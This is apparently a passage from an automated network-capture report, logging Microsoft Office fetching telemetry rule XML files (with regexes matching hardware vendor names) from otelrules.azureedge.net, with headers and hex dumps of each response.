                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      112192.168.2.45127613.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:05 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: bf2855ec-b01e-0084-57b7-2ad736000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182005Z-16849878b78tg5n42kspfr0x4800000009t000000000xv9z
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      113192.168.2.45128013.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:05 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 428
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: b4871f28-d01e-00a1-686d-2b35b1000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182005Z-17c5cb586f6f98jx9q4y7udcaw00000001e000000000ap5d
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      114192.168.2.45127913.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:05 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 1abafd92-601e-0070-072b-27a0c9000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182005Z-16849878b78j5kdg3dndgqw0vg0000000bmg00000000ek9g
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      115192.168.2.45127813.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:05 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 862c7620-501e-0029-4f4f-29d0b8000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182005Z-15b8d89586fnsf5zkvx8tfb0zc00000004xg00000000mwr6
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:05 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      116192.168.2.45128113.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:06 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:06 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:06 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 499
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 283bb1f9-001e-0066-5cf3-2a561e000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182006Z-16849878b787bfsh7zgp804my400000008k000000000yy8k
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:06 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      117192.168.2.45128213.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:06 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:06 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 4e15243a-401e-005b-2294-2a9c0c000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182006Z-159b85dff8fx9jp8hC1DFWp25400000001wg000000005vc3
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      118192.168.2.45128513.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:06 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:06 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: fa11464d-701e-0032-1f49-27a540000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182006Z-16849878b78km6fmmkbenhx76n000000094g00000000vvp5
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      119192.168.2.45128413.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:06 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:06 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 516b9b86-001e-0017-3b4b-2b0c3c000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182006Z-17c5cb586f69dpr98vcd9da8e800000001c0000000007b7r
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:07 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      120192.168.2.45128313.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:06 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
